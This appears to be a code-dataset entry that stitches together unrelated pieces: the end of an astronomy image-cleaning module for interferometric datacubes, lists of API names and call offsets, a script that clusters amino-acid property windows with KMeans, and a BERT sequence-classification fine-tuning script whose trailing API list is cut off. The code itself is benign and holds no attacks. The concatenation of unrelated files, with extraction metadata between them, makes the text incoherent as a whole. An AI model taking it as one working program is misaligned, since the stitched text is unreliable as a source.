plt.plot([xs1, xs2, xs3, xs4, xs1], [ys1, ys2, ys3, ys4, ys1], 'w--',
label='Resized image')
if not noBadPixel:
if remove_bad:
label = 'Fixed hot/bad pixels'
else:
label = 'Hot/bad pixels'
plt.scatter(bad_pix_y, bad_pix_x, color='', marker='s',
edgecolors='r', s=20, label=label)
plt.legend(fontsize=7, loc=1)
plt.tight_layout()
return fig
def clean_data(data, isz=None, r1=None, dr=None, edge=0,
r2=None, bad_map=None, add_bad=[], apod=True,
offx=0, offy=0, sky=True, window=None,
f_kernel=3, verbose=False):
""" Clean data.
Parameters:
-----------
`data` {np.array} -- datacube containing the NRM data\n
`isz` {int} -- Size of the cropped image (default: {None})\n
`r1` {int} -- Radius of the rings to compute background sky (default: {None})\n
`dr` {int} -- Outer radius to compute sky (default: {None})\n
    `edge` {int} -- Patch the edges of the image (VLT/SPHERE artifact, default: {0}),\n
    `verbose` {bool} -- If True, print details about the sky subtraction (default: {False})\n
Returns:
--------
`cube` {np.array} -- Cleaned datacube.
"""
# print(data.shape[1])
# if data.shape[1] % 2 == 1:
# data = np.array([im[:-1, :-1] for im in data])
n_im = data.shape[0]
cube_cleaned = np.zeros([n_im, isz, isz])
for i in tqdm(range(n_im), ncols=100, desc='Cleaning', leave=False):
img0 = data[i]
if edge != 0:
img0[:, 0:edge] = 0
img0[:, -edge:-1] = 0
img0[0:edge, :] = 0
img0[-edge:-1, :] = 0
if bad_map is not None:
img1 = fix_bad_pixels(img0, bad_map, add_bad=add_bad)
else:
img1 = img0.copy()
im_rec_max = crop_max(img1, isz, offx=offx, offy=offy, f=f_kernel)[0]
if sky:
img_biased = sky_correction(im_rec_max, r1=r1, dr=dr,
verbose=verbose)[0]
else:
img_biased = im_rec_max.copy()
img_biased[img_biased < 0] = 0 # Remove negative pixels
if img_biased.shape[0] != img_biased.shape[1]:
cprint(
'\nCropped image do not have same X, Y dimensions -> check isz', 'red')
return None
if apod:
if r2 is None:
r2 = isz//3
img = apply_windowing(img_biased, window=window)
else:
img = img_biased.copy()
cube_cleaned[i] = img
return cube_cleaned
def select_clean_data(filename, isz=256, r1=100, r2=None, dr=10, edge=0,
clip=True, bad_map=None, add_bad=[], offx=0, offy=0,
clip_fact=0.5, apod=True, sky=True, window=None,
f_kernel=3, verbose=False, ihdu=0, display=False):
""" Clean and select good datacube (sigma-clipping using fluxes variations).
Parameters:
-----------
`filename` {str}: filename containing the datacube,\n
`isz` {int}: Size of the cropped image (default: 256)\n
`r1` {int}: Radius of the rings to compute background sky (default: 100)\n
`dr` {int}: Outer radius to compute sky (default: 10)\n
    `edge` {int}: Patch the edges of the image (VLT/SPHERE artifact, default: {0}),\n
`clip` {bool}: If True, sigma-clipping is used to reject frames with low integrated flux,\n
`clip_fact` {float}: Relative sigma if rejecting frames by sigma-clipping
(default=0.5),\n
Returns:
--------
`cube_final` {np.array}: Cleaned and selected datacube.
"""
hdu = fits.open(filename)
cube = hdu[ihdu].data
hdr = hdu[0].header
if hdr['INSTRUME'] == 'SPHERE':
seeing_start = float(hdr['HIERARCH ESO TEL AMBI FWHM START'])
seeing = float(hdr['HIERARCH ESO TEL IA FWHM'])
seeing_end = float(hdr['HIERARCH ESO TEL AMBI FWHM END'])
if verbose:
print('\n----- Seeing conditions -----')
print("%2.2f (start), %2.2f (end), %2.2f (Corrected AirMass)" %
(seeing_start, seeing_end, seeing))
raw_size = cube.shape[1]
if isz > raw_size:
raise ValueError(
'Reshape factor is larger than the data size (choose a smaller isz).')
cube_cleaned = clean_data(cube, isz=isz, r1=r1, edge=edge,
r2=r2, bad_map=bad_map, add_bad=add_bad,
dr=dr, sky=sky, apod=apod, window=window,
f_kernel=f_kernel, offx=offx, offy=offy,
verbose=verbose)
if cube_cleaned is None:
return None
cube_final = select_data(cube_cleaned, clip=clip, clip_fact=clip_fact,
verbose=verbose, display=display)
return cube_final
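# Illustrative usage sketch (an assumption, not from the AMICAL documentation):
# clean and select a datacube with the default parameters; the filename below
# is hypothetical.
def _example_pipeline(filename="nrm_datacube.fits"):
    # Returns the cleaned, sigma-clipped cube, or None if the cropping failed.
    return select_clean_data(filename, isz=256, r1=100, dr=10, clip=True, display=False)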
|
[
"matplotlib.pyplot.grid",
"numpy.sqrt",
"matplotlib.pyplot.ylabel",
"numpy.array",
"astropy.io.fits.open",
"numpy.sin",
"numpy.arange",
"numpy.mean",
"numpy.where",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.plot",
"amical.tools.apply_windowing",
"numpy.fft.fft2",
"numpy.max",
"numpy.linspace",
"matplotlib.pyplot.scatter",
"numpy.min",
"numpy.argmin",
"termcolor.cprint",
"numpy.argmax",
"matplotlib.colors.PowerNorm",
"astropy.convolution.interpolate_replace_nans",
"numpy.cos",
"numpy.std",
"matplotlib.pyplot.title",
"matplotlib.pyplot.legend",
"amical.tools.crop_max",
"matplotlib.pyplot.show",
"numpy.median",
"matplotlib.pyplot.figure",
"numpy.zeros",
"matplotlib.pyplot.tight_layout",
"astropy.convolution.Gaussian2DKernel",
"numpy.fft.fftshift",
"matplotlib.pyplot.subplot"
] |
[((2288, 2312), 'numpy.array', 'np.array', (['cube_corrected'], {}), '(cube_corrected)\n', (2296, 2312), True, 'import numpy as np\n'), ((3422, 3438), 'numpy.array', 'np.array', (['fluxes'], {}), '(fluxes)\n', (3430, 3438), True, 'import numpy as np\n'), ((3455, 3474), 'numpy.array', 'np.array', (['flag_fram'], {}), '(flag_fram)\n', (3463, 3474), True, 'import numpy as np\n'), ((3490, 3507), 'numpy.argmax', 'np.argmax', (['fluxes'], {}), '(fluxes)\n', (3499, 3507), True, 'import numpy as np\n'), ((3523, 3540), 'numpy.argmin', 'np.argmin', (['fluxes'], {}), '(fluxes)\n', (3532, 3540), True, 'import numpy as np\n'), ((3557, 3571), 'numpy.std', 'np.std', (['fluxes'], {}), '(fluxes)\n', (3563, 3571), True, 'import numpy as np\n'), ((3587, 3604), 'numpy.median', 'np.median', (['fluxes'], {}), '(fluxes)\n', (3596, 3604), True, 'import numpy as np\n'), ((6549, 6592), 'numpy.sqrt', 'np.sqrt', (['(xx2 ** 2 + yy2[:, np.newaxis] ** 2)'], {}), '(xx2 ** 2 + yy2[:, np.newaxis] ** 2)\n', (6556, 6592), True, 'import numpy as np\n'), ((7518, 7553), 'astropy.convolution.Gaussian2DKernel', 'Gaussian2DKernel', ([], {'x_stddev': 'x_stddev'}), '(x_stddev=x_stddev)\n', (7534, 7553), False, 'from astropy.convolution import Gaussian2DKernel, interpolate_replace_nans\n'), ((7572, 7613), 'astropy.convolution.interpolate_replace_nans', 'interpolate_replace_nans', (['img_nan', 'kernel'], {}), '(img_nan, kernel)\n', (7596, 7613), False, 'from astropy.convolution import Gaussian2DKernel, interpolate_replace_nans\n'), ((9093, 9146), 'amical.tools.crop_max', 'crop_max', (['img1', 'isz'], {'offx': 'offx', 'offy': 'offy', 'f': 'f_kernel'}), '(img1, isz, offx=offx, offy=offy, f=f_kernel)\n', (9101, 9146), False, 'from amical.tools import apply_windowing, crop_max\n'), ((9546, 9576), 'numpy.linspace', 'np.linspace', (['(0)', '(2 * np.pi)', '(100)'], {}), '(0, 2 * np.pi, 100)\n', (9557, 9576), True, 'import numpy as np\n'), ((10060, 10086), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(6, 6)'}), '(figsize=(6, 6))\n', (10070, 10086), True, 'from matplotlib import pyplot as plt\n'), ((10169, 10227), 'matplotlib.pyplot.plot', 'plt.plot', (['x1', 'y1'], {'label': '"""Inner radius for sky subtraction"""'}), "(x1, y1, label='Inner radius for sky subtraction')\n", (10177, 10227), True, 'from matplotlib import pyplot as plt\n'), ((10232, 10290), 'matplotlib.pyplot.plot', 'plt.plot', (['x2', 'y2'], {'label': '"""Outer radius for sky subtraction"""'}), "(x2, y2, label='Outer radius for sky subtraction')\n", (10240, 10290), True, 'from matplotlib import pyplot as plt\n'), ((10402, 10469), 'matplotlib.pyplot.plot', 'plt.plot', (['x0', 'y0', '"""+"""'], {'color': '"""g"""', 'ms': '(10)', 'label': '"""Centering position"""'}), "(x0, y0, '+', color='g', ms=10, label='Centering position')\n", (10410, 10469), True, 'from matplotlib import pyplot as plt\n'), ((10474, 10571), 'matplotlib.pyplot.plot', 'plt.plot', (['[xs1, xs2, xs3, xs4, xs1]', '[ys1, ys2, ys3, ys4, ys1]', '"""w--"""'], {'label': '"""Resized image"""'}), "([xs1, xs2, xs3, xs4, xs1], [ys1, ys2, ys3, ys4, ys1], 'w--', label\n ='Resized image')\n", (10482, 10571), True, 'from matplotlib import pyplot as plt\n'), ((10844, 10873), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'fontsize': '(7)', 'loc': '(1)'}), '(fontsize=7, loc=1)\n', (10854, 10873), True, 'from matplotlib import pyplot as plt\n'), ((10878, 10896), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (10894, 10896), True, 'from matplotlib import pyplot as plt\n'), ((11894, 11920), 
'numpy.zeros', 'np.zeros', (['[n_im, isz, isz]'], {}), '([n_im, isz, isz])\n', (11902, 11920), True, 'import numpy as np\n'), ((14138, 14157), 'astropy.io.fits.open', 'fits.open', (['filename'], {}), '(filename)\n', (14147, 14157), False, 'from astropy.io import fits\n'), ((1903, 1948), 'numpy.sqrt', 'np.sqrt', (['(xx_c ** 2 + yy_c[:, np.newaxis] ** 2)'], {}), '(xx_c ** 2 + yy_c[:, np.newaxis] ** 2)\n', (1910, 1948), True, 'import numpy as np\n'), ((1968, 2017), 'numpy.sqrt', 'np.sqrt', (['(xx_off ** 2 + yy_off[:, np.newaxis] ** 2)'], {}), '(xx_off ** 2 + yy_off[:, np.newaxis] ** 2)\n', (1975, 2017), True, 'import numpy as np\n'), ((3051, 3068), 'numpy.fft.fft2', 'np.fft.fft2', (['cube'], {}), '(cube)\n', (3062, 3068), True, 'import numpy as np\n'), ((3276, 3298), 'numpy.argmax', 'np.argmax', (['fft_fram[i]'], {}), '(fft_fram[i])\n', (3285, 3298), True, 'import numpy as np\n'), ((4092, 4111), 'numpy.array', 'np.array', (['good_fram'], {}), '(good_fram)\n', (4100, 4111), True, 'import numpy as np\n'), ((4129, 4159), 'numpy.where', 'np.where', (['(fluxes <= limit_flux)'], {}), '(fluxes <= limit_flux)\n', (4137, 4159), True, 'import numpy as np\n'), ((4375, 4387), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (4385, 4387), True, 'from matplotlib import pyplot as plt\n'), ((4396, 4501), 'matplotlib.pyplot.plot', 'plt.plot', (['fluxes'], {'label': "('|$\\\\Delta F$|/$\\\\sigma_F$=%2.0f (%2.2f %%)' % (med_flux / std_flux, diffmm))"}), "(fluxes, label='|$\\\\Delta F$|/$\\\\sigma_F$=%2.0f (%2.2f %%)' % (\n med_flux / std_flux, diffmm))\n", (4404, 4501), True, 'from matplotlib import pyplot as plt\n'), ((5043, 5077), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': '"""best"""', 'fontsize': '(9)'}), "(loc='best', fontsize=9)\n", (5053, 5077), True, 'from matplotlib import pyplot as plt\n'), ((5086, 5113), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Flux [counts]"""'], {}), "('Flux [counts]')\n", (5096, 5113), True, 'from matplotlib import pyplot as plt\n'), ((5122, 5144), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""# frames"""'], {}), "('# frames')\n", (5132, 5144), True, 'from matplotlib import pyplot as plt\n'), ((5153, 5172), 'matplotlib.pyplot.grid', 'plt.grid', ([], {'alpha': '(0.2)'}), '(alpha=0.2)\n', (5161, 5172), True, 'from matplotlib import pyplot as plt\n'), ((5180, 5198), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (5196, 5198), True, 'from matplotlib import pyplot as plt\n'), ((5208, 5234), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(7, 7)'}), '(figsize=(7, 7))\n', (5218, 5234), True, 'from matplotlib import pyplot as plt\n'), ((5243, 5263), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(2)', '(2)', '(1)'], {}), '(2, 2, 1)\n', (5254, 5263), True, 'from matplotlib import pyplot as plt\n'), ((5272, 5309), 'matplotlib.pyplot.title', 'plt.title', (["('Best fram (%i)' % best_fr)"], {}), "('Best fram (%i)' % best_fr)\n", (5281, 5309), True, 'from matplotlib import pyplot as plt\n'), ((5395, 5415), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(2)', '(2)', '(2)'], {}), '(2, 2, 2)\n', (5406, 5415), True, 'from matplotlib import pyplot as plt\n'), ((5498, 5518), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(2)', '(2)', '(3)'], {}), '(2, 2, 3)\n', (5509, 5518), True, 'from matplotlib import pyplot as plt\n'), ((5527, 5576), 'matplotlib.pyplot.title', 'plt.title', (["('Worst fram (%i) %s' % (worst_fr, ext))"], {}), "('Worst fram (%i) %s' % (worst_fr, ext))\n", (5536, 5576), True, 'from matplotlib import pyplot as 
plt\n'), ((5663, 5683), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(2)', '(2)', '(4)'], {}), '(2, 2, 4)\n', (5674, 5683), True, 'from matplotlib import pyplot as plt\n'), ((5767, 5785), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (5783, 5785), True, 'from matplotlib import pyplot as plt\n'), ((5794, 5815), 'matplotlib.pyplot.show', 'plt.show', ([], {'block': '(False)'}), '(block=False)\n', (5802, 5815), True, 'from matplotlib import pyplot as plt\n'), ((6449, 6463), 'numpy.arange', 'np.arange', (['isz'], {}), '(isz)\n', (6458, 6463), True, 'import numpy as np\n'), ((6465, 6479), 'numpy.arange', 'np.arange', (['isz'], {}), '(isz)\n', (6474, 6479), True, 'import numpy as np\n'), ((6731, 6752), 'numpy.mean', 'np.mean', (['imB[cond_bg]'], {}), '(imB[cond_bg])\n', (6738, 6752), True, 'import numpy as np\n'), ((6807, 6828), 'numpy.mean', 'np.mean', (['imC[cond_bg]'], {}), '(imC[cond_bg])\n', (6814, 6828), True, 'import numpy as np\n'), ((9395, 9417), 'numpy.where', 'np.where', (['(bad_map == 1)'], {}), '(bad_map == 1)\n', (9403, 9417), True, 'import numpy as np\n'), ((10728, 10823), 'matplotlib.pyplot.scatter', 'plt.scatter', (['bad_pix_y', 'bad_pix_x'], {'color': '""""""', 'marker': '"""s"""', 'edgecolors': '"""r"""', 's': '(20)', 'label': 'label'}), "(bad_pix_y, bad_pix_x, color='', marker='s', edgecolors='r', s=\n 20, label=label)\n", (10739, 10823), True, 'from matplotlib import pyplot as plt\n'), ((1749, 1763), 'numpy.arange', 'np.arange', (['isz'], {}), '(isz)\n', (1758, 1763), True, 'import numpy as np\n'), ((1765, 1779), 'numpy.arange', 'np.arange', (['isz'], {}), '(isz)\n', (1774, 1779), True, 'import numpy as np\n'), ((3672, 3819), 'termcolor.cprint', 'cprint', (['("""\nStd of the fluxes along the cube < 5 (%2.1f):\n -> sigma clipping is suggested (clip=True)."""\n % (med_flux / std_flux))', '"""cyan"""'], {}), '(\n """\nStd of the fluxes along the cube < 5 (%2.1f):\n -> sigma clipping is suggested (clip=True)."""\n % (med_flux / std_flux), \'cyan\')\n', (3678, 3819), False, 'from termcolor import cprint\n'), ((3995, 4025), 'numpy.where', 'np.where', (['(fluxes <= limit_flux)'], {}), '(fluxes <= limit_flux)\n', (4003, 4025), True, 'import numpy as np\n'), ((4554, 4682), 'matplotlib.pyplot.scatter', 'plt.scatter', (['flag_fram', 'fluxes[flag_fram]'], {'s': '(52)', 'facecolors': '"""none"""', 'edgecolors': '"""r"""', 'label': '"""Rejected frames (maximum fluxes)"""'}), "(flag_fram, fluxes[flag_fram], s=52, facecolors='none',\n edgecolors='r', label='Rejected frames (maximum fluxes)')\n", (4565, 4682), True, 'from matplotlib import pyplot as plt\n'), ((5435, 5469), 'numpy.fft.fftshift', 'np.fft.fftshift', (['fft_fram[best_fr]'], {}), '(fft_fram[best_fr])\n', (5450, 5469), True, 'import numpy as np\n'), ((5703, 5738), 'numpy.fft.fftshift', 'np.fft.fftshift', (['fft_fram[worst_fr]'], {}), '(fft_fram[worst_fr])\n', (5718, 5738), True, 'import numpy as np\n'), ((5939, 6005), 'termcolor.cprint', 'cprint', (['"""\n---- σ-clip + centered fluxes selection ---"""', '"""cyan"""'], {}), '("""\n---- σ-clip + centered fluxes selection ---""", \'cyan\')\n', (5945, 6005), False, 'from termcolor import cprint\n'), ((6029, 6086), 'termcolor.cprint', 'cprint', (['"""\n---- centered fluxes selection ---"""', '"""cyan"""'], {}), '("""\n---- centered fluxes selection ---""", \'cyan\')\n', (6035, 6086), False, 'from termcolor import cprint\n'), ((8740, 8759), 'astropy.io.fits.open', 'fits.open', (['filename'], {}), '(filename)\n', (8749, 8759), False, 'from astropy.io import 
fits\n'), ((9622, 9635), 'numpy.cos', 'np.cos', (['theta'], {}), '(theta)\n', (9628, 9635), True, 'import numpy as np\n'), ((9655, 9668), 'numpy.sin', 'np.sin', (['theta'], {}), '(theta)\n', (9661, 9668), True, 'import numpy as np\n'), ((9688, 9701), 'numpy.cos', 'np.cos', (['theta'], {}), '(theta)\n', (9694, 9701), True, 'import numpy as np\n'), ((9721, 9734), 'numpy.sin', 'np.sin', (['theta'], {}), '(theta)\n', (9727, 9734), True, 'import numpy as np\n'), ((10113, 10127), 'matplotlib.colors.PowerNorm', 'PowerNorm', (['(0.5)'], {}), '(0.5)\n', (10122, 10127), False, 'from matplotlib.colors import PowerNorm\n'), ((10347, 10397), 'matplotlib.pyplot.plot', 'plt.plot', (['x3', 'y3'], {'label': '"""Super-gaussian windowing"""'}), "(x3, y3, label='Super-gaussian windowing')\n", (10355, 10397), True, 'from matplotlib import pyplot as plt\n'), ((12335, 12388), 'amical.tools.crop_max', 'crop_max', (['img1', 'isz'], {'offx': 'offx', 'offy': 'offy', 'f': 'f_kernel'}), '(img1, isz, offx=offx, offy=offy, f=f_kernel)\n', (12343, 12388), False, 'from amical.tools import apply_windowing, crop_max\n'), ((12724, 12809), 'termcolor.cprint', 'cprint', (['"""\nCropped image do not have same X, Y dimensions -> check isz"""', '"""red"""'], {}), '("""\nCropped image do not have same X, Y dimensions -> check isz""",\n \'red\')\n', (12730, 12809), False, 'from termcolor import cprint\n'), ((12935, 12977), 'amical.tools.apply_windowing', 'apply_windowing', (['img_biased'], {'window': 'window'}), '(img_biased, window=window)\n', (12950, 12977), False, 'from amical.tools import apply_windowing, crop_max\n'), ((4770, 4848), 'matplotlib.pyplot.plot', 'plt.plot', (['ind_clip', 'fluxes[ind_clip]', '"""rx"""'], {'label': '"""Rejected frames (clipping)"""'}), "(ind_clip, fluxes[ind_clip], 'rx', label='Rejected frames (clipping)')\n", (4778, 4848), True, 'from matplotlib import pyplot as plt\n'), ((5349, 5363), 'matplotlib.colors.PowerNorm', 'PowerNorm', (['(0.5)'], {}), '(0.5)\n', (5358, 5363), False, 'from matplotlib.colors import PowerNorm\n'), ((5617, 5631), 'matplotlib.colors.PowerNorm', 'PowerNorm', (['(0.5)'], {}), '(0.5)\n', (5626, 5631), False, 'from matplotlib.colors import PowerNorm\n'), ((6933, 6984), 'termcolor.cprint', 'cprint', (['"""Warning: Background not computed"""', '"""green"""'], {}), "('Warning: Background not computed', 'green')\n", (6939, 6984), False, 'from termcolor import cprint\n'), ((6997, 7076), 'termcolor.cprint', 'cprint', (['"""-> check the inner and outer radius rings (checkrad option)."""', '"""green"""'], {}), "('-> check the inner and outer radius rings (checkrad option).', 'green')\n", (7003, 7076), False, 'from termcolor import cprint\n'), ((9805, 9818), 'numpy.cos', 'np.cos', (['theta'], {}), '(theta)\n', (9811, 9818), True, 'import numpy as np\n'), ((9842, 9855), 'numpy.sin', 'np.sin', (['theta'], {}), '(theta)\n', (9848, 9855), True, 'import numpy as np\n'), ((4309, 4323), 'numpy.max', 'np.max', (['fluxes'], {}), '(fluxes)\n', (4315, 4323), True, 'import numpy as np\n'), ((4326, 4340), 'numpy.min', 'np.min', (['fluxes'], {}), '(fluxes)\n', (4332, 4340), True, 'import numpy as np\n')]
|
# Simplified Bres Maker
# Version: 1.0
#Python Version: 2.0
# IMPORTS
import pandas as pd
import numpy as np
from sklearn.cluster import KMeans
from numpy import asarray
from numpy import savetxt
import sys
import os
# DEFINITIONS
def find(s, ch):
return [i for i, ltr in enumerate(s) if ltr == ch]
# DATALOAD
#user_input = str(sys.argv[1])
#ranking = str(sys.argv[2])
#working = str(sys.argv[3])
#iterations = int(sys.argv[4])
#trys = int(sys.argv[5])
user_input = "D:/Proseeker/exampledeets.csv"
ranking = "D:/Proseeker/ranking.csv"
working = "D:/Proseeker"
iterations = 1000000
trys = 1000
aavals = pd.read_csv(ranking, usecols=['A','R','N','D','C','Q','E','G','H','I','L','K','M','F','P','S','T','W','Y','V'],
sep =',')
d = {}
for i in range(0,544):
    # Min-max normalise each row of the ranking table in place.
    rowmin = min(aavals.iloc[i])
    rowmax = max(aavals.iloc[i])
    for j in range(0,20):
        val = aavals.iloc[i, j]
        aavals.iloc[i, j] = (val - rowmin)/(rowmax - rowmin)
d['A'] = list(aavals['A'])
d['R'] = list(aavals['R'])
d['D'] = list(aavals['D'])
d['N'] = list(aavals['N'])
d['C'] = list(aavals['C'])
d['E'] = list(aavals['E'])
d['Q'] = list(aavals['Q'])
d['G'] = list(aavals['G'])
d['H'] = list(aavals['H'])
d['I'] = list(aavals['I'])
d['L'] = list(aavals['L'])
d['K'] = list(aavals['K'])
d['M'] = list(aavals['M'])
d['F'] = list(aavals['F'])
d['P'] = list(aavals['P'])
d['S'] = list(aavals['S'])
d['T'] = list(aavals['T'])
d['W'] = list(aavals['W'])
d['Y'] = list(aavals['Y'])
d['V'] = list(aavals['V'])
library = pd.read_csv(user_input, header=None, sep=',')
seqs = library[0]
sites = library[1]
# PROCESSING
for x in range(0, len(seqs)):
subjectstd = list(seqs[x])
subject = list.copy(subjectstd)
for p in range(0,len(subjectstd)):
subject.append(subjectstd[p])
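    # Note: the sequence was appended to itself above so that a 13-residue
    # window centred near the end of the sequence does not run past the list bounds.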
    # Map each residue letter (upper- or lower-case) to its property vector.
    for z in range(0, len(subject)):
        aa = subject[z].upper()
        if aa in d:
            subject[z] = d[aa]
subjectsites = str(sites[x])
splits = find(subjectsites, ':')
splits.append(len(subjectsites))
if sum(splits) > 0:
for q in range(len(splits)):
if q == 0:
subpos = int(subjectsites[0:splits[q]])
else:
subpos = int(subjectsites[splits[q-1]+1:splits[q]])
breswindow = list((subject[subpos-6], subject[subpos-5], subject[subpos-4], subject[subpos-3],
subject[subpos-2], subject[subpos-1], subject[subpos], subject[subpos+1],
subject[subpos+2], subject[subpos+3], subject[subpos+4], subject[subpos+5],
subject[subpos+6]))
breswindow = np.column_stack(breswindow)
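            # breswindow is now a (544, 13) array: one row per ranking-table
            # descriptor and one column per residue position in the 13-residue
            # window. KMeans groups the 544 descriptor rows into 50 clusters and
            # the labels are appended below as a 14th column before saving.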
kmeans = KMeans(n_clusters=50, n_init=trys, max_iter=iterations, algorithm="full")
kmeans.fit(breswindow)
clusters = kmeans.labels_
breswindow = np.insert(breswindow, 13, clusters, axis=1)
savetxt(os.path.join(working, 'p{}.bres{}.csv'.format(x+1, q+1)), breswindow, delimiter=',', fmt='%f')
|
[
"sklearn.cluster.KMeans",
"numpy.insert",
"numpy.column_stack",
"pandas.read_csv"
] |
[((616, 759), 'pandas.read_csv', 'pd.read_csv', (['ranking'], {'usecols': "['A', 'R', 'N', 'D', 'C', 'Q', 'E', 'G', 'H', 'I', 'L', 'K', 'M', 'F', 'P',\n 'S', 'T', 'W', 'Y', 'V']", 'sep': '""","""'}), "(ranking, usecols=['A', 'R', 'N', 'D', 'C', 'Q', 'E', 'G', 'H',\n 'I', 'L', 'K', 'M', 'F', 'P', 'S', 'T', 'W', 'Y', 'V'], sep=',')\n", (627, 759), True, 'import pandas as pd\n'), ((1554, 1599), 'pandas.read_csv', 'pd.read_csv', (['user_input'], {'header': 'None', 'sep': '""","""'}), "(user_input, header=None, sep=',')\n", (1565, 1599), True, 'import pandas as pd\n'), ((5185, 5212), 'numpy.column_stack', 'np.column_stack', (['breswindow'], {}), '(breswindow)\n', (5200, 5212), True, 'import numpy as np\n'), ((5234, 5307), 'sklearn.cluster.KMeans', 'KMeans', ([], {'n_clusters': '(50)', 'n_init': 'trys', 'max_iter': 'iterations', 'algorithm': '"""full"""'}), "(n_clusters=50, n_init=trys, max_iter=iterations, algorithm='full')\n", (5240, 5307), False, 'from sklearn.cluster import KMeans\n'), ((5406, 5449), 'numpy.insert', 'np.insert', (['breswindow', '(13)', 'clusters'], {'axis': '(1)'}), '(breswindow, 13, clusters, axis=1)\n', (5415, 5449), True, 'import numpy as np\n')]
|
import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score, recall_score, precision_score, f1_score
import torch
from transformers import TrainingArguments, Trainer
from transformers import BertTokenizer, BertForSequenceClassification
from transformers import EarlyStoppingCallback
import pdb
import argparse
import traceback
import sys
DEFAULT_MODEL_PATH="./model"
DEFAULT_OUTPUT_DIR="./output"
DEFAULT_SEQUENCE_LENGTH=512
class Dataset(torch.utils.data.Dataset):
def __init__(self, encodings, labels=None):
self.encodings = encodings
self.labels = labels
def __getitem__(self, idx):
item = {key: torch.tensor(val[idx]) for key, val in self.encodings.items()}
if self.labels:
item["labels"] = torch.tensor(self.labels[idx])
return item
def __len__(self):
return len(self.encodings["input_ids"])
# Define Trainer parameters
def compute_metrics(p):
pred, labels = p
pred = np.argmax(pred, axis=1)
accuracy = accuracy_score(y_true=labels, y_pred=pred)
recall = recall_score(y_true=labels, y_pred=pred)
precision = precision_score(y_true=labels, y_pred=pred)
f1 = f1_score(y_true=labels, y_pred=pred)
return {"accuracy": accuracy, "precision": precision, "recall": recall, "f1": f1}
def fine_tune(params):
input_file = params.input
model_name_or_path = params.model
output_dir = params.output
paired = params.paired
seq_length = params.seq_length
# Read data
#data = pd.read_csv("data/tokenized_train.csv",sep='\t')
data = pd.read_csv(input_file,sep='\t')
# Define pretrained tokenizer and model
#model_name = "bert-large-cased"
model_name = model_name_or_path
tokenizer = BertTokenizer.from_pretrained(model_name)
model = BertForSequenceClassification.from_pretrained(model_name, num_labels=2)
device = torch.device("cuda") if torch.cuda.is_available() else torch.device("cpu")
model.to(device)
# ----- 1. Preprocess data -----#
# Preprocess data
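    # For paired input the two sentences are temporarily joined with a tab so
    # that train_test_split keeps each pair together; they are split back into
    # text / text_pair lists before tokenization.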
if (paired):
X1 = list(data["text1"])
X2 = list(data["text2"])
assert(len(X1) == len(X2))
X = []
for i in range(len(X1)):
X.append(X1[i] + '\t' + X2[i])
else:
X = list(data["text"])
y = list(data["label"])
X_train, X_val, y_train, y_val = train_test_split(X, y, test_size=0.01)
if (paired):
X1 = []
X2 = []
for i in range(len(X_train)):
arr = X_train[i].split('\t')
assert(len(arr) == 2)
X1.append(arr[0])
X2.append(arr[1])
#pdb.set_trace()
X_train_tokenized = tokenizer(text=X1, text_pair = X2, padding=True, truncation=True, max_length=seq_length)
else:
X_train_tokenized = tokenizer(X_train, padding=True, truncation=True, max_length=seq_length)
if (paired):
X1 = []
X2 = []
for i in range(len(X_val)):
arr = X_val[i].split('\t')
assert(len(arr) == 2)
X1.append(arr[0])
X2.append(arr[1])
X_val_tokenized = tokenizer(text = X1, text_pair = X2, padding=True, truncation=True, max_length=seq_length)
else:
X_val_tokenized = tokenizer(X_val, padding=True, truncation=True, max_length=seq_length)
# Create torch dataset
train_dataset = Dataset(X_train_tokenized, y_train)
val_dataset = Dataset(X_val_tokenized, y_val)
# ----- 2. Fine-tune pretrained model -----#
# Define Trainer
args = TrainingArguments(
output_dir=output_dir,
evaluation_strategy="steps",
eval_steps=100,
save_steps=100,
warmup_steps=500,
per_device_train_batch_size=32,
per_device_eval_batch_size=32,
#learning_rate = 1e-5,
num_train_epochs=5,
#weight_decay=0.01,
seed=0,
load_best_model_at_end=True,
logging_dir='./logs', # directory for storing logs
logging_steps=10,
metric_for_best_model="accuracy"
)
trainer = Trainer(
model=model,
args=args,
train_dataset=train_dataset,
eval_dataset=val_dataset,
compute_metrics=compute_metrics,
#callbacks=[EarlyStoppingCallback(early_stopping_patience=3)],
)
# Train pre-trained model
trainer.train()
trainer.save_model(output_dir)
print("Model saved. Training complete")
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Fine tune model ',formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('-model', action="store", dest="model", default=DEFAULT_MODEL_PATH,help='BERT pretrained models, or custom model path')
parser.add_argument('-input', action="store", dest="input",required=True, help='Input train data file')
parser.add_argument('-output', action="store", dest="output",default=DEFAULT_OUTPUT_DIR, help='Output directory where model is saved')
parser.add_argument('-seq_length', action="store", dest="seq_length",type=int,default=DEFAULT_SEQUENCE_LENGTH, help='Default max sequence length of input')
parser.add_argument('-paired', dest="paired", action='store_true',help='Input is expected to be **pairs** of sentences')
parser.add_argument('-no-paired', dest="paired", action='store_false',help='Input is expected to be **single** sentence - not pairs of sentences')
parser.set_defaults(paired=False)
results = parser.parse_args()
try:
torch.cuda.empty_cache()
fine_tune(results)
except:
print("Unexpected error:", sys.exc_info()[0])
traceback.print_exc(file=sys.stdout)
|
[
"sklearn.metrics.f1_score",
"pandas.read_csv",
"transformers.TrainingArguments",
"sklearn.model_selection.train_test_split",
"argparse.ArgumentParser",
"transformers.BertTokenizer.from_pretrained",
"numpy.argmax",
"sklearn.metrics.precision_score",
"sklearn.metrics.recall_score",
"torch.tensor",
"sys.exc_info",
"transformers.BertForSequenceClassification.from_pretrained",
